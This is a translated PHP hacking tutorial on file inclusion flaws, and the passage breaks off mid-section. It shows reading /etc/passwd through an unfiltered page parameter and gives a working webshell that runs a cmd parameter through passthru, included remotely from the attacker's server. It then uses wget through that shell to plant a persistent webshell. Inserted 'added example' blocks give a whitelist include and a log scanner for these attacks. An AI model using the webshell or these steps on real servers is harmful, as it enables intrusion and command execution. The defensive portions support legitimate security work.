Detailed description of file inclusion vulnerabilities

Author: IceskYsl @ 1st
Source: Tianma Xingkong {1.S.T}
Statement: Original to this site; reprinting is welcome, please credit Tianma Xingkong {1.S.T}.

First, let's discuss the file inclusion vulnerability. The first question is: what is a "remote file inclusion vulnerability"? The answer: when the server uses a PHP feature (function) to include a file, and the source of the file to be included is not strictly filtered, a malicious file can end up being included; we can construct that malicious file to achieve malicious purposes. Almost all CGI programs have this kind of bug, but the specific form it takes differs.

I. Dangerous functions involved: include(), require(), include_once(), require_once()

include() & require() statements: include and run the specified file.

These two constructs are identical except in how they handle failure. include() generates a warning, while require() causes a fatal error. In other words, if you want processing of the page to stop when a file is missing, use require(); with include() this is not the case, and the script continues to run.
If "allow_url_fopen" is enabled in PHP (it is by default), you can also specify the file to be included by URL (over HTTP or another supported wrapper protocol) instead of a local path. If the target server interprets the target file as PHP code, you can pass variables to the included file using an HTTP GET query string.

require_once() & include_once()
The require_once() and include_once() statements include and run the specified file during script execution. This behaves like the require() statement; the only difference is that if the code from the file has already been included, it will not be included again. This is useful when the same file might be included more than once during script execution and you want to make sure it is included only once, to avoid function redefinitions and variable reassignments.

II. Why file inclusion?

When programmers write programs, they do not like doing the same thing or writing the same code (such as some common functions) several times, so the shared code is written into a separate file, such as share.php, which is then included from the other files. In PHP, the functions listed above achieve this. The workflow: if a file needs share.php, I write include("share.php") and can then use the functions in share.php. As long as the name of the file to include is hard-coded, there is no problem or vulnerability. So where exactly is the problem?
Sometimes you may not know in advance which file to include. For example, look at the index.php code below:
CODE:

<?php
if ($_GET['page']) {
    include $_GET['page'];   // the request parameter is used directly as the file to include
} else {
    include "home.php";
}
?>
This is an ordinary piece of PHP code. How does it work? It involves the meaning of $_GET, which I won't go into here (or I could write an article on HTTP). If you still don't know what GET, POST and so on are, you need to look up the relevant information on Google.
The URL for the code above might look like ?page=main.php or http://…?page=downloads.php:
1. Submit the URL above; index.php obtains the value of page ($_GET[page]).
2. Check whether $_GET[page] is empty. If it is not empty (main.php here), use include to include that file.
3. If $_GET[page] is empty, run the else branch and include the home.php file.
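As an added example (not code from the original article), here is the same index.php pattern rewritten so that the page parameter selects a key in a fixed table instead of being used as a path; the page names are assumed.

```php
<?php
// Added example (not from the original article): the dynamic include
// from index.php above, rewritten so the request parameter selects a
// key in a fixed table instead of being used as a path. Page names
// are assumed.

// Permitted values of ?page= and the local files they map to. A URL,
// ../ sequence or absolute path can never appear as a key here.
const PAGES = [
    'home'      => 'home.php',
    'main'      => 'main.php',
    'downloads' => 'downloads.php',
];

// Return the file to load for a requested page key, falling back to
// home for anything missing or unknown rather than echoing the input.
function resolvePage(?string $requested): string
{
    if ($requested === null || !array_key_exists($requested, PAGES)) {
        return PAGES['home'];
    }
    return PAGES[$requested];
}

// is_string() guards against ?page[]=... arrays, which would be a
// TypeError for the string parameter.
$requested = $_GET['page'] ?? null;
$file = resolvePage(is_string($requested) ? $requested : null);

// Anchor to this script's directory so include_path cannot redirect it.
include __DIR__ . '/' . $file;
```

Independently of the code, keeping allow_url_include=Off in php.ini (its default since PHP 5.2.0) makes include() of an http:// URL fail even when allow_url_fopen stays on, and open_basedir confines what a local path can reach.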

III. Why does a vulnerability arise?

You may say this is fine: it is very convenient to include files dynamically according to the URL, so how can this cause a vulnerability? The answer: we are not so obedient; we always like to be different from others and will not follow the links he provides. We may want to specify our own file to include (call). For example, we might enter the following URL at random: http://…?page=hello.php. Then our index.php program naively follows the steps above: it gets page as hello.php and calls include(hello.php). Now the problem occurs, because there is no hello.php file, so a warning is reported when it is included, similar to the following:

Warning: include(hello.php) [function.include]: failed to open stream: No such file or directory in /vhost/wwwroot/php/index.php on line 3
Warning: include() [function.include]: Failed opening 'hello.php' for inclusion (include_path='.:') in /vhost/wwwroot/php/index.php on line 3

Note that the first warning says the specified hello.php file cannot be found, that is, the file at the given path does not exist. The second warning says that, because the file was not found, a warning is raised when it is included.

IV. How it is exploited

As we saw above, there is a problem. So how can such a vulnerability be exploited? There are actually many exploitation methods, but they are essentially similar. Here I will talk about three common ones:

1. Including other files on the target machine to read them

As we saw above, because the obtained parameter page is not filtered, we can specify other sensitive files on the target host at will. For instance, the previous warning exposed the absolute path (/vhost/wwwroot/php/), so we can probe repeatedly to include other files, for example specifying the URL http://…?page=./txt.txt to read txt.txt from the current directory, or using ../../ to jump directories (when ../ is not filtered). You can also specify an absolute path directly to read sensitive system files, for example the URL http://…?page=/etc/passwd. If the target host has no strict permission restrictions, or Apache runs with relatively high privileges, you can read the content of this file; otherwise you get a warning similar to "open_basedir restriction in effect."

2. Include a runnable PHP Trojan

If the target host has "allow_url_fopen" enabled, we can write a file such as the following with any suffix (the suffix is not important, as long as the content is PHP code).
CODE:

<?php
if (get_magic_quotes_gpc()) {
    $_REQUEST["cmd"] = stripslashes($_REQUEST["cmd"]); // remove escape characters (strips the backslashes from the string)
}
ini_set("max_execution_time", 0); // execution time limit for this file; 0 is unlimited
echo "1.S.T\n";                   // print the start marker line
passthru($_REQUEST["cmd"]);       // run the command specified by cmd
echo "1.S.T\n";                   // print the end marker line
?>
The purpose of the file above is to accept the command specified by cmd and call passthru() to execute it, returning the output between the two 1.S.T markers. Save this file on a server of our own (it may be a host that does not support PHP), as long as it can be accessed over HTTP, for example at http://…. Then we construct the following URL on the vulnerable host: http://…?page=…&cmd=ls. After cmd= comes the command you need to execute. Other commonly used commands (taking *UNIX as an example) are:

ll          list the directory and files (equivalent to dir on Windows)
pwd         show the current absolute path
id, whoami  show the current user
wget        download the file at the specified URL

And others; search Baidu for the rest.
The method above yields a webshell (although the PHP file is not on the target machine, it is indeed a webshell, isn't it? Haha).
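Added example, not part of the original article, for the defender's side of sections 1 and 2: a small scanner that flags web-server access-log requests whose page parameter carries a traversal sequence, an absolute path, or a URL/wrapper scheme. The log lines are constructed for illustration.

```php
<?php
// Added example, not from the original article: flag access-log requests
// that carry the inclusion patterns discussed above (directory traversal,
// absolute paths, remote URLs in ?page=). Log lines are constructed.

$accessLog = [
    '10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET /index.php?page=main.php HTTP/1.1" 200 512',
    '10.0.0.9 - - [01/Jan/2024:10:00:01 +0000] "GET /index.php?page=../../etc/passwd HTTP/1.1" 200 1024',
    '10.0.0.9 - - [01/Jan/2024:10:00:02 +0000] "GET /index.php?page=/etc/passwd HTTP/1.1" 200 1024',
    '10.0.0.9 - - [01/Jan/2024:10:00:03 +0000] "GET /index.php?page=http://example.net/x.txt&cmd=ls HTTP/1.1" 200 300',
    '10.0.0.9 - - [01/Jan/2024:10:00:04 +0000] "GET /index.php?page=..%2F..%2Fetc%2Fpasswd HTTP/1.1" 200 1024',
];

// Classify one combined-format line; null means nothing suspicious.
function classifyInclusionAttempt(string $line): ?string
{
    if (!preg_match('/"(?:GET|POST) (\S+) HTTP\//', $line, $m)) {
        return null;
    }
    $query = parse_url($m[1], PHP_URL_QUERY);
    if (!is_string($query)) {
        return null;                       // no query string at all
    }
    parse_str($query, $params);            // also URL-decodes %2F etc.
    $page = $params['page'] ?? '';
    if (!is_string($page) || $page === '') {
        return null;
    }
    // Any scheme (http://, ftp://, php://, data://) means a wrapper
    // would be opened instead of a local file.
    if (preg_match('#^[a-z][a-z0-9+.-]*://#i', $page)) {
        return 'remote-or-wrapper-inclusion';
    }
    if (strpos($page, '../') !== false || strpos($page, '..\\') !== false) {
        return 'directory-traversal';
    }
    if ($page[0] === '/') {
        return 'absolute-path-read';       // e.g. /etc/passwd
    }
    return null;
}

foreach ($accessLog as $line) {
    $verdict = classifyInclusionAttempt($line);
    if ($verdict !== null) {
        echo str_pad($verdict, 30), $line, PHP_EOL;
    }
}
```

On a real server, correlate the flagged source addresses with the include() warnings from section III in the PHP error log, which record the exact path that was attempted.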

3. Include a PHP file that creates a file

Some people may feel that getting a real webshell on the target machine is more reassuring: if someone notices and fixes the vulnerability, we can no longer remotely include the "pseudo" webshell above, right? We can understand this mentality. Let's continue. To get a real webshell, we'll also discuss two common methods:

1) Use a command such as wget to download a webshell

This is simple and often used. In the pseudo-webshell obtained above we can execute commands, so we can also call a very powerful tool on the system, wget. This command is powerful; you can find many parameters on Google, and they will definitely confuse you. Haha, we don't need anything so complicated. We will use -O (--output-document=FILE, write the document to FILE).
The premise is that you place a webshell containing PHP code somewhere accessible over HTTP or FTP, for example http://…; that file holds the webshell content. Then we request the following URL: …?page=…&cmd=wget … 1stphp.php. If the current directory is writable, you get a webshell named 1stphp.php; if the current directory is not writable, you need to think of other methods.

2) Use a file-creating script

The wget above may run into a current directory that cannot be written, or the command may be disabled (or not installed) on the target host, in which case we need another approach: we can combine it with the file inclusion vulnerability above and include a PHP script that creates (writes) a file. Its content is as follows:
